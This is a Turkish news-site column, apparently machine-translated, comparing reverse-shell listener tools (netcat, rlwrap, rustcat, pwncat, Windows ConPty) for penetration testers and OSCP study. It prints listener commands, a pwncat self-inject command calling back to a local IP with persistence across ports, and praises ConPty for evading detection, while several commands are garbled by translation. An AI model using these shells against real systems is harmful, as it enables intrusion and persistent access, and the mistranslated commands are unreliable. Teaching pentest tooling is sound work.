Ana Sayfa Arama Galeri Video Yazarlar
Üyelik
Üye Girişi
Yayın/Gazete
Yayınlar
Kategoriler
Servisler
Nöbetçi Eczaneler Sayfası Nöbetçi Eczaneler Hava Durumu Namaz Vakitleri Puan Durumu
WhatsApp
WhatsApp İhbar Hattı
Sosyal Medya
Uygulamamızı İndir
Sercan BAYRAM
Sercan BAYRAM
e-posta: sercan.bayram@tv90haber.com YAZARIN TÜM YAZILARI

Netcat Listener’ın En İyi Alternatifi

Netcat Listener’ın En İyi Alternatifi

  • Ters Kabuk Üreticisi
  • Yeni Başlayanlar İçin Netcat
  • OSCP için RLWrap
  • OSCP için Rustcat
  • Kırmızı Takımlar için Pwncat
  • OSCP ve Red Teamers için Windows ConPty

Ters Kabuk Üreticisi

Ters bir kabuk oluşturmak için işletim sistemine bağlı olarak ters kabuklar ve dinleyiciler için çok sayıda komut sağlayan ve Uzaktan Komut Yürütme senaryoları için ideal olan RevShells’i kullanabilirsiniz .

Netcat

Genellikle ” ağ dünyasının İsviçre çakısı ” olarak anılan Netcat , basit TCP ve UDP bağlantıları oluşturmak için çok yönlü bir araçtır . Minimalist tasarımı ve geniş işlevselliği, onu sızma testi uzmanları arasında favori haline getirir. Temel özellikleri şunlardır:

  • Temel Bağlantı
  • Port Tarama
  • Dosya Transferi
  • Uzaktan Kabuk Erişimi

Kali makinesinde 4444 numaralı porttan bir Netcat dinleyicisi başlatabilirsiniz . Netcat dinleyicisi için aşağıdaki komutu kullanın :

nc -lnvp 4444

Ters kabuk üretecinden ters kabuk komutunu oluşturduktan sonra , Ubuntu işletim sisteminde ters kabuk komutunu çalıştırın .

Sonuç olarak yukarıdaki komutu Ubuntu işletim sisteminde çalıştırdığınızda Kali makinesinde ters bir kabuk elde edersiniz .

Sınırlama: Ancak kullanıcılar, üst ok tuşuna basarak önceki komutu tekrar kullandıktan sonra terminalin komutu tamamlamadığını gözlemliyorlar.

OSCP için rlwrap

“Readline Wrapper”ın kısaltması olan rlwrap, komut satırı arayüzlerinin kullanılabilirliğini artırır. Özel bir dinleyici aracı olmasa da, Netcat gibi kabuk tabanlı araçlarla etkileşim deneyimini şu şekilde geliştirir:

  • Komut Satırı Geçmişi
  • Otomatik tamamlama

Netcat’e göre RLwrap’in avantajları

rlwrap, Netcat oturumlarına komut geçmişi ve düzenleme yetenekleri ekleyerek komutların geri çağrılmasını ve değiştirilmesini kolaylaştırır. Pentest uzmanları, rlwrap’in sekme tamamlama özelliğinden yararlanarak, mevcut girdiye göre olası tamamlamaları önererek komut girişini hızlandırır.

rlwrap’in kurulumu basittir, sadece aşağıdaki komutu kullanın:

apt install rlwrap

Kurulumdan sonra netcat bölümünde anlatılan tüm işlemleri tekrarlayın, ancak ters kabuk için rlwrap’ı kullanmak üzere aşağıdaki dinleyici komutunu kullanın:

rlwrap nc -lvnp 4444

Avantaj: Ters kabuk elde edildikten sonra komutun otomatik olarak tamamlanıp tekrar kullanılabildiğini gözlemleyin.

OSCP için Rustcat

Rust programlama dilinde Netcat’in modern bir yeniden uygulaması olan Rustcat, Netcat’in işlevselliğini korurken gelişmiş performans ve güvenlik sağlamayı amaçlamaktadır. Benimsenmesinin temel nedenleri şunlardır:

  • Bağlantı noktalarını dinleme amacına hizmet eder
  • Geçmişi Yakala
  • Kullanıcı dostu
  • UDP’yi destekler
  • Renkleri kullanır

Rustcat, Rust’ın bellek güvenliği özelliklerinden yararlanarak arabellek taşmaları gibi yaygın güvenlik açıklarının oluşma olasılığını azaltır. Tasarımı, eş zamanlı bağlantılara olanak tanıyarak sızma test uzmanlarının birden fazla oturumu verimli bir şekilde yönetmesini sağlar. Netcat gibi Rustcat da birden fazla platformda kullanılabilir ve farklı işletim sistemleri arasında uyumluluğu garanti eder.

Rustcat’in kurulumu cargo kullanılarak yapılabilir, aşağıdaki komut kullanılabilir:

uygun kurulum kargo

kargo kurulumu rustcat

/root/.cargo/bin’i yola eklediğinizden emin olun

yankı $SHELL
nano .zshrc

/root/.cargo/bin’i Export Path olarak ekleyin .

Kurulumdan sonra netcat bölümünde anlatılan tüm işlemleri tekrarlayın, ancak ters kabuk için rustcat’ı kullanmak üzere aşağıdaki dinleyici komutunu kullanın:

rcat dinle -ib 1234

Avantaj: rcat’ta sekme tamamlamanın etkin olduğunu ve komutları otomatik tamamlamak için kullanılabildiğini gözlemleyin.

Rcat’ta sekme tamamlamanın etkin olduğunu ve komutları otomatik tamamlamak için kullanılabileceğini unutmayın.

Ancak UDP (-lpu) bağlantısı ve Geçmiş fonksiyonu (-lpH) gibi daha dinamik özelliklere sahiptir 

Red Teamer için Pwncat

Penetrasyon test uzmanları ve kırmızı takım üyeleri için tasarlanmış, özelliklerle dolu bir Netcat benzeri araç olan Pwncat, geleneksel Netcat’e göre çeşitli geliştirmeler sunuyor:

  • Etkileşimli Kabuk
  • Komut Dosyası Yazılabilir Arayüz
  • Şifreli İletişim
  • Azim

Sözdizimi vurgulama ve komut tamamlama özelliklerine sahip etkileşimli bir kabuk sağlayarak kullanıcı deneyimini iyileştirir. Pentest uzmanları, Pwncat’in Python betik arayüzünü kullanarak görevleri otomatikleştirebilir, bu da daha fazla esneklik ve özelleştirme olanağı sağlar. Ayrıca, şifreli iletişim kanallarını destekleyerek, güvenliği ihlal edilmiş sistemlerle etkileşim sırasında gizliliği garanti eder.

Pwncat kurulumu pip kullanılarak yapılabilir, aşağıdaki komut kullanılabilir:

pip install pwncat

Kurulumdan sonra netcat bölümünde anlatılan tüm işlemleri tekrarlayın, ancak ters kabuk için pwncat’ı kullanmak üzere aşağıdaki dinleyici komutunu kullanın:

pwncat -l 1234 –kendi kendine enjekte et /bin/bash: 192.168 . 1 . 7 : 1234

Avantaj: pwncat’in /tmp/ dizininde bir dosya oluşturarak kalıcılık sağladığını gözlemleyin. Bu nedenle, bir bağlantı kopsa bile, daha önce kalıcılık olarak kullanılan aynı bağlantı noktasından ters kabuk elde edilebilir.

Yukarıdaki bağlantıyı sonlandırdıktan sonra aynı portta bir rlwrap dinleyicisi çalıştırılarak kalıcılık kontrol edilebilir.

Pwncat, aşağıdaki komutları kullanarak gerçekleştirebileceğiniz birden fazla portta kalıcılık oluşturma özelliğini sağlar:

pwncat -l 1234 –kendi kendine enjekte et /bin/bash: 192.168 . 1 . 7 : 1234 + 2

1234 numaralı portun yanı sıra 1235 ve 1236 numaralı portlarda da ters kabuğun elde edilebildiği görülmektedir.

Windows ConPty Kabuğu

Pentest’in cephaneliğine daha yeni eklenen Windows ConPty kabuğu, Windows 10’da tanıtılan ConPty işlevselliğinden yararlanır. Geleneksel kabuklara göre çeşitli avantajlar sunar:

  • Geliştirilmiş TTY
  • Stabilite ve Uyumluluk
  • Kaçınma Teknikleri

ConPty kabuğu, Vim ve Python gibi komut satırı yardımcı programlarının düzgün bir şekilde kullanılması da dahil olmak üzere daha etkileşimli bir deneyime olanak tanıyan gelişmiş TTY işlevselliği sağlar.

Avantajı: Modern Windows sistemleriyle daha uyumlu ve daha kararlıdır, bu da istismar sonrası faaliyetler için güvenilir bir seçenek sunar. Pentest uzmanları, geleneksel tespit yöntemlerinden kaçınarak güvenlik mekanizmalarını atlatmak için ConPty kabuğunu kullanabilirler.

Dinleyici komutu ve ters kabuk yükü için ters kabuk üretecini kullanabilirsiniz.

Kali makinesinde dinleyiciyi 443 numaralı porttan başlatmak için ters kabuk üreteci web sitesindeki komutu kullanabilirsiniz.

Şimdi Windows makinesinde ters kabuk yükünü kullanıp ters kabuk üretecinden kopyalanan komutu çalıştıralım.

Ters kabuğun 443 numaralı porttan elde edildiğini ve tamamen etkileşimli bir oturum olduğunu gözlemleyin.

Sonuç olarak, pentester’ların her biri benzersiz özellikler ve avantajlar sunan çeşitli dinleyici seçenekleri mevcuttur. İster Netcat’in basitliği, ister Rlwrap’in kullanılabilirlik iyileştirmeleri, ister Rustcat’in performans ve güvenliği, ister Pwncat’in gelişmiş özellikleri veya Windows ConPty kabuğunun modern işlevselliği olsun, doğru aracı seçmek değerlendirmenin özel gereksinimlerine bağlıdır.

Bu araçların güçlü ve zayıf yönlerini anlayan sızma test uzmanları, güvenlik görevleri sırasında erişimi etkili bir şekilde kurabilir ve sürdürebilir.

YORUMLAR

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

YAZARLAR
TÜMÜ

SON HABERLER